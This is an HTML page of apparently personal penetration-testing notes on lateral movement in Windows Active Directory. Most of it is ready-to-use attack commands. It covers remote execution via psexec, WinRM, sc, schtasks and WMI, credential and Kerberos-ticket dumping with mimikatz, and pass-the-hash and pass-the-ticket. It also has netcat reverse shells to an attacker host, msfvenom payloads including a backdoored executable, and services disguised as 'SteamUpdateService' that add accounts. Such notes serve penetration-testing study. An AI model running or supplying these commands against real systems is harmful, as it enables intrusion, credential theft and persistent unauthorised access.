stefan
/
husk
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
husk/build/misc/active_directory/lateral_movement.html

594 lines
56 KiB
HTML
Raw Normal View History

init
2022-09-02 09:05:59 +02:00
<!doctype html>
<html lang="en">
<center>
<head>
<script src="https://cdn.jsdelivr.net/npm/fuse.js/dist/fuse.js"></script>
<!-- mathjax -->
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script type="text/javascript" src="/static/js/auto-complete.js"></script>
<script type="text/javascript" src="/static/js/lunr.min.js"></script>
<script type="text/javascript" src="/static/js/search.js"></script>
<link rel="stylesheet" href="/static/stylesheet.css">
<link rel="stylesheet" href="/static/auto-complete.css">
<br>
<title>In the Open</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
<!-- topmenu -->
<div class="menu">
<a href="/" style="text-decoration:none">In the Open</a>
</div>
<div class="search-container">
<label for="search-by"><i class="fas fa-search"></i></label>
<input data-search-input="" id="search-by" type="search" placeholder="Search..." autocomplete="off">
<!--button type="submit"><i class="search"></i>&#128269;</button>-->
<span data-search-clear=""><i class="fas fa-times"></i></span>
</div>
</div>
<div class="menu">
</div>
<!--br><br-->
</center>
<p></p>
<div class="columns">
<!-- Sidebar -->
<div class="column column-1">
<ul><details id=crypto ontoggle="linkClick(this); return false;" ><summary>Crypto</summary><ul><details id=openssl ontoggle="linkClick(this); return false;" ><summary>Openssl</summary><ul><li><a href="/crypto/openssl/openssl.html">openssl</a></li><li><a href="/crypto/openssl/openssl_engine.html">openssl_engine</a></li></ul></details><li><a href="/crypto/rsa.html">rsa</a></li></ul></details><details id=enumeration ontoggle="linkClick(this); return false;" ><summary>Enumeration</summary><ul><details id=containers ontoggle="linkClick(this); return false;" ><summary>Containers</summary><ul></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/enumeration/docs/aws.html">aws</a></li><li><a href="/enumeration/docs/cewl.html">cewl</a></li><li><a href="/enumeration/docs/dns.html">dns</a></li><li><a href="/enumeration/docs/docker_enumeration.html">docker_enumeration</a></li><li><a href="/enumeration/docs/ffuf.html">ffuf</a></li><li><a href="/enumeration/docs/gobuster.html">gobuster</a></li><li><a href="/enumeration/docs/kerberoast.html">kerberoast</a></li><li><a href="/enumeration/docs/kubectl.html">kubectl</a></li><li><a href="/enumeration/docs/ldap.html">ldap</a></li><li><a href="/enumeration/docs/linux_basics.html">linux_basics</a></li><li><a href="/enumeration/docs/microk8s.html">microk8s</a></li><li><a href="/enumeration/docs/nfs.html">nfs</a></li><li><a href="/enumeration/docs/nikto.html">nikto</a></li><li><a href="/enumeration/docs/nmap.html">nmap</a></li><li><a href="/enumeration/docs/port_knocking.html">port_knocking</a></li><li><a href="/enumeration/docs/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/docs/rsync.html">rsync</a></li><li><a href="/enumeration/docs/rustscan.html">rustscan</a></li><li><a href="/enumeration/docs/shodan.html">shodan</a></li><details id=snmp ontoggle="linkClick(this); return false;" ><summary>Snmp</summary><ul><li><a href="/enumeration/docs/snmp/onesixtyone.html">onesixtyone</a></li><li><a href="/enumeration/docs/snmp/snmpcheck.html">snmpcheck</a></li></ul></details><li><a href="/enumeration/docs/websites.html">websites</a></li><li><a href="/enumeration/docs/wfuzz.html">wfuzz</a></li><li><a href="/enumeration/docs/wpscan.html">wpscan</a></li></ul></details><details id=network_scanners ontoggle="linkClick(this); return false;" ><summary>Network_scanners</summary><ul></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/enumeration/windows/bloodhound.html">bloodhound</a></li><li><a href="/enumeration/windows/event_log.html">event_log</a></li><li><a href="/enumeration/windows/manual_enum.html">manual_enum</a></li><li><a href="/enumeration/windows/powershell.html">powershell</a></li><li><a href="/enumeration/windows/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/windows/sysinternals.html">sysinternals</a></li><li><a href="/enumeration/windows/sysmon.html">sysmon</a></li><li><a href="/enumeration/windows/vss.html">vss</a></li></ul></details></ul></details><details id=exfiltration ontoggle="linkClick(this); return false;" ><summary>Exfiltration</summary><ul><details id=dns ontoggle="linkClick(this); return false;" ><summary>Dns</summary><ul><li><a href="/exfiltration/dns/dns.html">dns</a></li></ul></details><details id=linux ontoggle="linkClick(this); return false;" ><summary>Linux</summary><ul><li><a href="/exfiltration/linux/nc.html">nc</a></li><li><a href="/exfiltration/linux/wget.html">wget</a></li></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/exfiltration/windows/evil-winrm.html">evil-winrm</a></li><li><a href="/exfiltration/windows/loot.html">loot</a></li><li><a href="/exfiltration/windows/smb_connection.html">smb_connection</a></li></ul></details></ul></details><details id=exploit ontoggle="linkClick(this); return false;" ><summary>Exploit</summary><ul><details id=CPUs ontoggle="linkClick(this); return false;" ><summary>CPUs</summary><ul><li><a href="/exploit/CPUs
</ul>
</div>
<div class="column column-2">
<span class="body">
<style>pre { line-height: 125%; }
td.linenos .normal { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
.codehilite .hll { background-color: #2C3B41 }
.codehilite .c { color: #546E7A; font-style: italic } /* Comment */
.codehilite .err { color: #FF5370 } /* Error */
.codehilite .esc { color: #89DDFF } /* Escape */
.codehilite .g { color: #EEFFFF } /* Generic */
.codehilite .k { color: #BB80B3 } /* Keyword */
.codehilite .l { color: #C3E88D } /* Literal */
.codehilite .n { color: #EEFFFF } /* Name */
.codehilite .o { color: #89DDFF } /* Operator */
.codehilite .p { color: #89DDFF } /* Punctuation */
.codehilite .ch { color: #546E7A; font-style: italic } /* Comment.Hashbang */
.codehilite .cm { color: #546E7A; font-style: italic } /* Comment.Multiline */
.codehilite .cp { color: #546E7A; font-style: italic } /* Comment.Preproc */
.codehilite .cpf { color: #546E7A; font-style: italic } /* Comment.PreprocFile */
.codehilite .c1 { color: #546E7A; font-style: italic } /* Comment.Single */
.codehilite .cs { color: #546E7A; font-style: italic } /* Comment.Special */
.codehilite .gd { color: #FF5370 } /* Generic.Deleted */
.codehilite .ge { color: #89DDFF } /* Generic.Emph */
.codehilite .gr { color: #FF5370 } /* Generic.Error */
.codehilite .gh { color: #C3E88D } /* Generic.Heading */
.codehilite .gi { color: #C3E88D } /* Generic.Inserted */
.codehilite .go { color: #546E7A } /* Generic.Output */
.codehilite .gp { color: #FFCB6B } /* Generic.Prompt */
.codehilite .gs { color: #FF5370 } /* Generic.Strong */
.codehilite .gu { color: #89DDFF } /* Generic.Subheading */
.codehilite .gt { color: #FF5370 } /* Generic.Traceback */
.codehilite .kc { color: #89DDFF } /* Keyword.Constant */
.codehilite .kd { color: #BB80B3 } /* Keyword.Declaration */
.codehilite .kn { color: #89DDFF; font-style: italic } /* Keyword.Namespace */
.codehilite .kp { color: #89DDFF } /* Keyword.Pseudo */
.codehilite .kr { color: #BB80B3 } /* Keyword.Reserved */
.codehilite .kt { color: #BB80B3 } /* Keyword.Type */
.codehilite .ld { color: #C3E88D } /* Literal.Date */
.codehilite .m { color: #F78C6C } /* Literal.Number */
.codehilite .s { color: #C3E88D } /* Literal.String */
.codehilite .na { color: #BB80B3 } /* Name.Attribute */
.codehilite .nb { color: #82AAFF } /* Name.Builtin */
.codehilite .nc { color: #FFCB6B } /* Name.Class */
.codehilite .no { color: #EEFFFF } /* Name.Constant */
.codehilite .nd { color: #82AAFF } /* Name.Decorator */
.codehilite .ni { color: #89DDFF } /* Name.Entity */
.codehilite .ne { color: #FFCB6B } /* Name.Exception */
.codehilite .nf { color: #82AAFF } /* Name.Function */
.codehilite .nl { color: #82AAFF } /* Name.Label */
.codehilite .nn { color: #FFCB6B } /* Name.Namespace */
.codehilite .nx { color: #EEFFFF } /* Name.Other */
.codehilite .py { color: #FFCB6B } /* Name.Property */
.codehilite .nt { color: #FF5370 } /* Name.Tag */
.codehilite .nv { color: #89DDFF } /* Name.Variable */
.codehilite .ow { color: #89DDFF; font-style: italic } /* Operator.Word */
.codehilite .w { color: #EEFFFF } /* Text.Whitespace */
.codehilite .mb { color: #F78C6C } /* Literal.Number.Bin */
.codehilite .mf { color: #F78C6C } /* Literal.Number.Float */
.codehilite .mh { color: #F78C6C } /* Literal.Number.Hex */
.codehilite .mi { color: #F78C6C } /* Literal.Number.Integer */
.codehilite .mo { color: #F78C6C } /* Literal.Number.Oct */
.codehilite .sa { color: #BB80B3 } /* Literal.String.Affix */
.codehilite .sb { color: #C3E88D } /* Literal.String.Backtick */
.codehilite .sc { color: #C3E88D } /* Literal.String.Char */
.codehilite .dl { color: #EEFFFF } /* Literal.String.Delimiter */
.codehilite .sd { color: #546E7A; font-style: italic } /* Literal.String.Doc */
.codehilite .s2 { color: #C3E88D } /* Literal.String.Double */
.codehilite .se { color: #EEFFFF } /* Literal.String.Escape */
.codehilite .sh { color: #C3E88D } /* Literal.String.Heredoc */
.codehilite .si { color: #89DDFF } /* Literal.String.Interpol */
.codehilite .sx { color: #C3E88D } /* Literal.String.Other */
.codehilite .sr { color: #89DDFF } /* Literal.String.Regex */
.codehilite .s1 { color: #C3E88D } /* Literal.String.Single */
.codehilite .ss { color: #89DDFF } /* Literal.String.Symbol */
.codehilite .bp { color: #89DDFF } /* Name.Builtin.Pseudo */
.codehilite .fm { color: #82AAFF } /* Name.Function.Magic */
.codehilite .vc { color: #89DDFF } /* Name.Variable.Class */
.codehilite .vg { color: #89DDFF } /* Name.Variable.Global */
.codehilite .vi { color: #89DDFF } /* Name.Variable.Instance */
.codehilite .vm { color: #82AAFF } /* Name.Variable.Magic */
.codehilite .il { color: #F78C6C } /* Literal.Number.Integer.Long */</style>
<div class="column column-3">
<ul>
<li><a href="#lateral-movement">Lateral Movement</a><ul>
<li><a href="#remote-processes">Remote Processes</a><ul>
<li><a href="#psexec">psexec</a></li>
<li><a href="#winrm">WinRM</a></li>
<li><a href="#sc">sc</a></li>
<li><a href="#schtasks">schtasks</a></li>
<li><a href="#wmi">wmi</a></li>
</ul>
</li>
<li><a href="#further-authentication-methods">Further Authentication Methods</a><ul>
<li><a href="#ntlm">NTLM</a><ul>
<li><a href="#pass-the-hash">Pass the hash</a></li>
</ul>
</li>
<li><a href="#kerberos">Kerberos</a><ul>
<li><a href="#pass-the-ticket">Pass The Ticket</a></li>
<li><a href="#overpass-the-hash">Overpass The Hash</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#writeable-shares">Writeable Shares</a></li>
</ul>
</li>
</ul>
</div>
<h1 id="lateral-movement">Lateral Movement</h1>
<ul>
<li>Finding credentials with more permissions move through the network cloaked, avoiding detection</li>
<li>Context of connections from A to B with permission C might be suspicious, therefore some bypass has to be found</li>
<li>
<p>Local and network/domain accounts have to be distinguished. UAC is enforced on local admin accounts and not on domain accounts</p>
</li>
<li>
<p><strong>Service executables need their own special reverse shell</strong>, <code>msfvenom</code> file format <code>exe-service</code></p>
</li>
</ul>
<h2 id="remote-processes">Remote Processes</h2>
<h3 id="psexec">psexec</h3>
<ul>
<li>Port <code>445</code></li>
<li><code>SMB</code> protocol</li>
<li>
<p>Group membership: <code>Administrators</code></p>
</li>
<li>
<p>Upload the service binary to <code>ADMIN$</code> directory of the SMB server</p>
</li>
<li>Use <code>psexesvc.exe</code> via service control manager to execute the remote process</li>
<li>Communication will be established through a named pipe</li>
</ul>
<div class="codehilite"><pre><span></span><code>psexec64.exe <span class="se">\\</span>%TARGET_IP% -u Administrator -p %PASSWORD% -i cmd.exe
</code></pre></div>
<h3 id="winrm">WinRM</h3>
<ul>
<li>Ports <code>5985</code> (HTTP) and <code>5986</code> (HTTPS)</li>
<li>
<p>Group Membership: <code>Remote Management Users</code></p>
</li>
<li>
<p>Execute powershell commands on remote targets</p>
</li>
</ul>
<div class="codehilite"><pre><span></span><code>winrs.exe -u:Administrator -p:%PASSWORD% -r:target cmd
</code></pre></div>
<ul>
<li>Run through powershell alternatively via</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="nv">$username</span> <span class="o">=</span> <span class="s2">&quot;Administrator&quot;</span><span class="p">;</span>
<span class="nv">$password</span> <span class="o">=</span> <span class="s2">&quot;SecurePassword&quot;</span><span class="p">;</span>
<span class="nv">$securePassword</span> <span class="o">=</span> ConvertTo-SecureString <span class="nv">$password</span> -AsPlainText -Force<span class="p">;</span>
<span class="nv">$credential</span> <span class="o">=</span> New-Object System.Management.Automation.PSCredential <span class="nv">$username</span>, <span class="nv">$securePassword</span><span class="p">;</span>
Enter-PSSession -Computername TARGET -Credential <span class="nv">$credential</span>
Invoke-Command -Computername TARGET -Credential -ScriptBlock <span class="o">{</span>whoami<span class="o">}</span>
</code></pre></div>
<h3 id="sc">sc</h3>
<ul>
<li>Ports <code>135</code>, <code>49152-65535</code> (DCE/RPC), <code>135</code> shows service endpoints on the high ports</li>
<li>Ports <code>139</code> and <code>445</code>RPC over SMB named pipes, if SVCCTL fails over <code>135</code></li>
<li>
<p>Group Membership: <code>Administrators</code></p>
</li>
<li>
<p>Create service remotely via Service Control Manager (RPC) or <code>SVCCTL</code></p>
</li>
</ul>
<div class="codehilite"><pre><span></span><code>sc.exe <span class="se">\\</span>%TARGET_IP% create MyService <span class="nv">binPath</span><span class="o">=</span> <span class="s2">&quot;net user newuser securepassword /add&quot;</span> <span class="nv">start</span><span class="o">=</span> auto
sc.exe <span class="se">\\</span>%TARGET_IP% start MyService
sc.exe <span class="se">\\</span>%TARGET_IP% stop MyService
sc.exe <span class="se">\\</span>%TARGET_IP% delete MyService
</code></pre></div>
<h3 id="schtasks">schtasks</h3>
<ul>
<li>Create remote scheduled tasks</li>
</ul>
<div class="codehilite"><pre><span></span><code>schtasks /s TARGET /RU <span class="s2">&quot;SYSTEM&quot;</span> /create /tn <span class="s2">&quot;SteamUpdateService&quot;</span> /tr <span class="s2">&quot;&lt;command/payload to execute&gt;&quot;</span> /sc ONCE /sd <span class="m">01</span>/01/1970 /st <span class="m">00</span>:00
schtasks /s TARGET /run /TN <span class="s2">&quot;SteamUpdateService&quot;</span>
</code></pre></div>
<ul>
<li>Delete scheduled tasks via</li>
</ul>
<div class="codehilite"><pre><span></span><code>schtasks /S TARGET /TN <span class="s2">&quot;SteamUpdateService&quot;</span> /DELETE /F
</code></pre></div>
<h3 id="wmi">wmi</h3>
<ul>
<li>Ports are<ul>
<li>DCOM <code>135</code> RPC and dynamic ports</li>
<li>Wsman <code>5985</code> winrm HTTP and <code>5986</code> winrm HTTPS</li>
</ul>
</li>
<li>
<p>Group membership: <code>Administrators</code></p>
</li>
<li>
<p>To start, use the same object used for winrm</p>
</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="nv">$username</span> <span class="o">=</span> <span class="s2">&quot;Administrator&quot;</span><span class="p">;</span>
<span class="nv">$password</span> <span class="o">=</span> <span class="s2">&quot;SecurePassword&quot;</span><span class="p">;</span>
<span class="nv">$securePassword</span> <span class="o">=</span> ConvertTo-SecureString <span class="nv">$password</span> -AsPlainText -Force<span class="p">;</span>
<span class="nv">$credential</span> <span class="o">=</span> New-Object System.Management.Automation.PSCredential <span class="nv">$username</span>, <span class="nv">$securePassword</span><span class="p">;</span>
</code></pre></div>
<ul>
<li>Store the session</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="nv">$Opt</span> <span class="o">=</span> New-CimSessionOption -Protocol DCOM
<span class="nv">$Session</span> <span class="o">=</span> New-Cimsession -ComputerName TARGET -Credential <span class="nv">$credential</span> -SessionOption <span class="nv">$Opt</span> -ErrorAction Stop
</code></pre></div>
<ul>
<li><strong>Spawn a remote process</strong></li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="nv">$Command</span> <span class="o">=</span> <span class="s2">&quot;powershell.exe -Command Set-Content -Path C:\payload.txt -Value itworked&quot;</span><span class="p">;</span>
Invoke-CimMethod -CimSession <span class="nv">$Session</span> -ClassName Win32_Process -MethodName Create -Arguments @<span class="o">{</span>
<span class="nv">CommandLine</span> <span class="o">=</span> <span class="nv">$Command</span>
<span class="o">}</span>
</code></pre></div>
<ul>
<li>Alternatively via</li>
</ul>
<div class="codehilite"><pre><span></span><code>wmic.exe /user:Administrator /password:securepassword /node:TARGET process call create <span class="s2">&quot;cmd.exe /c nc64.exe -e cmd.exe %ATTACKER_IP% %ATTACKER_PORT%&quot;</span>
</code></pre></div>
<ul>
<li><strong>Spawn a remote service</strong></li>
</ul>
<div class="codehilite"><pre><span></span><code>Invoke-CimMethod -CimSession <span class="nv">$Session</span> -ClassName Win32_Service -MethodName Create -Arguments @<span class="o">{</span>
<span class="nv">Name</span> <span class="o">=</span> <span class="s2">&quot;SteamUpdateService&quot;</span><span class="p">;</span>
<span class="nv">DisplayName</span> <span class="o">=</span> <span class="s2">&quot;SteamUpdateService&quot;</span><span class="p">;</span>
<span class="nv">PathName</span> <span class="o">=</span> <span class="s2">&quot;net user gabenewell securepassword /add&quot;</span><span class="p">;</span>
<span class="nv">ServiceType</span> <span class="o">=</span> <span class="o">[</span>byte<span class="o">]</span>::Parse<span class="o">(</span><span class="s2">&quot;16&quot;</span><span class="o">)</span><span class="p">;</span> <span class="c1"># Win32OwnProcess : Start service in a new process</span>
<span class="nv">StartMode</span> <span class="o">=</span> <span class="s2">&quot;Manual&quot;</span>
<span class="o">}</span>
</code></pre></div>
<ul>
<li>Initiate the service</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="nv">$Service</span> <span class="o">=</span> Get-CimInstance -CimSession <span class="nv">$Session</span> -ClassName Win32_Service -filter <span class="s2">&quot;Name LIKE &#39;SteamUpdateService&#39;&quot;</span>
Invoke-CimMethod -InputObject <span class="nv">$Service</span> -MethodName StartService
</code></pre></div>
<ul>
<li>Start and stop via</li>
</ul>
<div class="codehilite"><pre><span></span><code>Invoke-CimMethod -InputObject <span class="nv">$Service</span> -MethodName StopService
Invoke-CimMethod -InputObject <span class="nv">$Service</span> -MethodName Delete
</code></pre></div>
<ul>
<li><strong>Spawn a remote scheduled task</strong></li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="nv">$Command</span> <span class="o">=</span> <span class="s2">&quot;cmd.exe&quot;</span>
<span class="nv">$Args</span> <span class="o">=</span> <span class="s2">&quot;/c net user gabenewell securepassword /add&quot;</span>
<span class="nv">$Action</span> <span class="o">=</span> New-ScheduledTaskAction -CimSession <span class="nv">$Session</span> -Execute <span class="nv">$Command</span> -Argument <span class="nv">$Args</span>
Register-ScheduledTask -CimSession <span class="nv">$Session</span> -Action <span class="nv">$Action</span> -User <span class="s2">&quot;NT AUTHORITY\SYSTEM&quot;</span> -TaskName <span class="s2">&quot;SteamUpdateService&quot;</span>
Start-ScheduledTask -CimSession <span class="nv">$Session</span> -TaskName <span class="s2">&quot;SteamUpdateService&quot;</span>
</code></pre></div>
<ul>
<li>Delete task via</li>
</ul>
<div class="codehilite"><pre><span></span><code>Unregister-ScheduledTask -CimSession <span class="nv">$Session</span> -TaskName <span class="s2">&quot;SteamUpdateService&quot;</span>
</code></pre></div>
<ul>
<li><strong> Install a remote msi package</strong></li>
</ul>
<div class="codehilite"><pre><span></span><code>msfvenom -p windows/x64/shell_reverse_tcp <span class="nv">LHOST</span><span class="o">=</span><span class="nv">$TARGET_IP</span> <span class="nv">LPORT</span><span class="o">=</span><span class="m">4711</span> -f msi -o steam.msi
</code></pre></div>
<ul>
<li>Upload and run via</li>
</ul>
<div class="codehilite"><pre><span></span><code>Invoke-CimMethod -CimSession <span class="nv">$Session</span> -ClassName Win32_Product -MethodName Install -Arguments @<span class="o">{</span><span class="nv">PackageLocation</span> <span class="o">=</span> <span class="s2">&quot;C:\Windows\steam.msi&quot;</span><span class="p">;</span> <span class="nv">Options</span> <span class="o">=</span> <span class="s2">&quot;&quot;</span><span class="p">;</span> <span class="nv">AllUsers</span> <span class="o">=</span> <span class="nv">$false</span><span class="o">}</span>
</code></pre></div>
<ul>
<li>Alternatively on older systems via</li>
</ul>
<div class="codehilite"><pre><span></span><code>wmic /node:TARGET /user:DOMAIN<span class="se">\U</span>SER product call install <span class="nv">PackageLocation</span><span class="o">=</span>c:<span class="se">\W</span>indows<span class="se">\s</span>team.msi
</code></pre></div>
<h2 id="further-authentication-methods">Further Authentication Methods</h2>
<ul>
<li>NTLM</li>
<li>Kerberos</li>
</ul>
<h3 id="ntlm">NTLM</h3>
<h4 id="pass-the-hash"><strong>Pass the hash</strong></h4>
<ul>
<li>
<p>Retrieve and pass a hash generated from the password</p>
</li>
<li>
<p>Use mimikatz on local SAM</p>
</li>
</ul>
<div class="codehilite"><pre><span></span><code>privilege::debug
token::elevate
lsadump::sam
</code></pre></div>
<div class="codehilite"><pre><span></span><code>* Use mimikatz on lsass
</code></pre></div>
<div class="codehilite"><pre><span></span><code>privilege::debug
token::elevate
sekurlsa::msv
</code></pre></div>
<div class="codehilite"><pre><span></span><code>* Open reverse shell via mimikatz
</code></pre></div>
<div class="codehilite"><pre><span></span><code>token::revert
sekurlsa::pth /user:&lt;username&gt;
/domain:&lt;domainname&gt; /ntlm:&lt;hash&gt; /run:<span class="s2">&quot;C:\Windows\temp\nc.exe -e cmd.exe %ATTACKER_IP% 4711&quot;</span>
</code></pre></div>
<ul>
<li>Via RDP</li>
</ul>
<div class="codehilite"><pre><span></span><code>xfreerdp /v:<span class="nv">$TARGET_IP</span> /u:DOMAIN<span class="se">\\</span>&lt;username&gt; /pth:&lt;ntlm-hash&gt;
</code></pre></div>
<ul>
<li>Via psexec</li>
</ul>
<div class="codehilite"><pre><span></span><code>psexec.py -hashes &lt;ntlm-hash&gt; DOMAIN/&lt;username&gt;@%TARGET_IP%
</code></pre></div>
<ul>
<li>Kerberos</li>
</ul>
<div class="codehilite"><pre><span></span><code>evil-winrm -i <span class="nv">$TARGET_IP</span> -u &lt;username&gt; -H &lt;ntlm-hash&gt;
</code></pre></div>
<h3 id="kerberos">Kerberos</h3>
<ul>
<li>Ticket and session key are needed</li>
</ul>
<h4 id="pass-the-ticket">Pass The Ticket</h4>
<ul>
<li>Extract via mimikatz</li>
</ul>
<div class="codehilite"><pre><span></span><code>privilege::debug
sekurlsa::tickets /export
</code></pre></div>
<ul>
<li>TGS need low privilege account, TGT need administrative privileges</li>
<li>Use the ticket to inject into a current session</li>
</ul>
<div class="codehilite"><pre><span></span><code>kerberos::ptt &lt;ticket&gt;@&lt;domain&gt;.kirbi
</code></pre></div>
<ul>
<li>Check tickets via <code>klist</code></li>
</ul>
<h4 id="overpass-the-hash">Overpass The Hash</h4>
<ul>
<li>Pass the key: Timestamp to gain TGT is encrypted via an encrypted key<ul>
<li>Algorithms can be <code>rc4</code>, <code>aes128</code>, <code>aes256</code> or <code>des</code> if enabled</li>
<li><code>rc4</code> is a pure ntml hash</li>
</ul>
</li>
<li>Use the key to gain the TGT </li>
</ul>
<div class="codehilite"><pre><span></span><code>privilege::debug
sekurlsa::ekeys
</code></pre></div>
<ul>
<li>Open a reverse shell via</li>
</ul>
<div class="codehilite"><pre><span></span><code>sekurlsa::pth /user:Administrator /domain:&lt;domain&gt; /&lt;hash-algorithm&gt;:&lt;hash&gt; /run:<span class="s2">&quot;C:\Windows\Temp\nc.exe -e cmd.exe %ATTACKER_IP% 4711&quot;</span>
</code></pre></div>
<h2 id="writeable-shares">Writeable Shares</h2>
<ul>
<li>
<p>Find a shortcut, a script or anything that keeps a connection over the network to a share</p>
</li>
<li>
<p>Reuse a <code>*.vbs</code> via</p>
</li>
</ul>
<div class="codehilite"><pre><span></span><code>CreateObject<span class="o">(</span><span class="s2">&quot;WScript.Shell&quot;</span><span class="o">)</span>.Run <span class="s2">&quot;cmd.exe /c copy /Y \\%TARGET_IP%\share\nc.exe %tmp% &amp; %tmp%\nc.exe -e cmd.exe %ATTACKER_IP% 4711&quot;</span>, <span class="m">0</span>, True
</code></pre></div>
<ul>
<li>Reuse and inject into exisiting portable executable</li>
</ul>
<div class="codehilite"><pre><span></span><code>msfvenom -a x64 --platform windows -x &lt;reused.exe&gt; -k -p windows/meterpreter/reverse_tcp <span class="nv">LHOST</span><span class="o">=</span><span class="nv">$ATTACKER_IP</span> <span class="nv">LPORT</span><span class="o">=</span><span class="m">4711</span> -b <span class="s2">&quot;\x00&quot;</span> -f exe -o &lt;new_reused.exe&gt;
</code></pre></div>
<ul>
<li>Reuse RDP session. Administrator can be logged out but did not close the session. Reuse it without a password as administrator user. Therefore run <code>cmd</code> or <code>powershell</code> as administrator and reuse the session by its name</li>
</ul>
<div class="codehilite"><pre><span></span><code>PsExec64.exe -s cmd.exe
query user
</code></pre></div>
<ul>
<li>Check output and fill in</li>
</ul>
<div class="codehilite"><pre><span></span><code>tscon &lt;ID-of-target&gt; /dest:&lt;my-SESSIONNAME&gt;
</code></pre></div>
<ul>
<li>Session state should be <code>DISC</code>, a session which was not exited correctly</li>
<li>Windows Server &lt; 2019 only without the password</li>
</ul>
</span>
</div>
</div>
<div id="footer">
<p></p>
<center>
&copy; Stefan Friese
</center>
</div>
<script>
function linkClick(obj) {
if (obj.open) {
console.log('open');
if (sessionStorage.getItem(obj.id) && !(sessionStorage.getItem(obj.id) === "open")) {
sessionStorage.removeItem(obj.id);
}
sessionStorage.setItem(obj.id,"open");
console.log(obj.id);
} else {
console.log('closed');
sessionStorage.removeItem(obj.id);
}
// if (obj.open) {
// console.log('open');
// if (sessionStorage.getItem("opened") && !(sessionStorage.getItem("opened") === obj.id)) {
// sessionStorage.removeItem("opened");
// }
// sessionStorage.setItem("opened", obj.id);
// console.log(obj);
// } else {
// console.log('closed');
// sessionStorage.removeItem("opened");
//
// }
}
//if ( sessionStorage.getItem("opened")) {
// var item = sessionStorage.getItem("opened")
// document.getElementById(item)['open'] = 'open';
//}
let _keys = Object.keys(sessionStorage);
if (_keys) {
for ( let i = 0; i < _keys.length; i++ ) {
document.getElementById(_keys[i])['open'] = 'open';
}
}
// const detailsElement = document.querySelector('.details-sidebar');
// detailsElement.addEventListener('toggle', event => {
// if (event.target.open) {
// console.log('open');
// if (sessionStorage.getItem("opened") && !(sessionStorage.getItem("opened") === detailsElement.id)) {
// sessionStorage.removeItem("opened");
// }
// sessionStorage.setItem("opened", detailsElement.id);
// console.log(detailsElement);
//
// } else {
// console.log('closed');
// sessionStorage.removeItem("opened");
//
// }
// });
//
// async function fetchIndexJSON() {
// const response = await fetch('/index.json');
// const index = await response.json();
// return index;
// }
// // Extract the `q` query parameter
//var queryStringRegex = /[\?&]q=([^&]+)/g;
//var matches = queryStringRegex.exec(window.location.search);
//if(matches && matches[1]) {
// var value = decodeURIComponent(matches[1].replace(/\+/g, '%20'));
//
//
// // fetchIndexJSON()
// // .then(index => { console.log(index['index']);});
// // Load the posts to search
// fetch('/index').then(function(posts) {
// // Remember to include Fuse.js before this script.
//
// var fuse = new Fuse(posts, {
// keys: ['title', 'tags', 'content'] // What we're searching
// });
//
// // Run the search
// var results = fuse.search(value);
// //console.log(results);
//
// // Generate markup for the posts, implement SearchResults however you want.
// // var $results = SearchResults(results);
//
// // Add the element to the empty <div> from before.
//// $('#searchResults').append($results);
// });
//}
</script>
<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/mathjax@2/MathJax.js"></script>
<script src="https://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script>
</script>
<script type="text/x-mathjax-config">
MathJax.Hub.Config({
config: ["MMLorHTML.js"],
jax: ["input/TeX", "output/HTML-CSS", "output/NativeMML"],
extensions: ["MathMenu.js", "MathZoom.js"]
});
</script>
</body>
</html>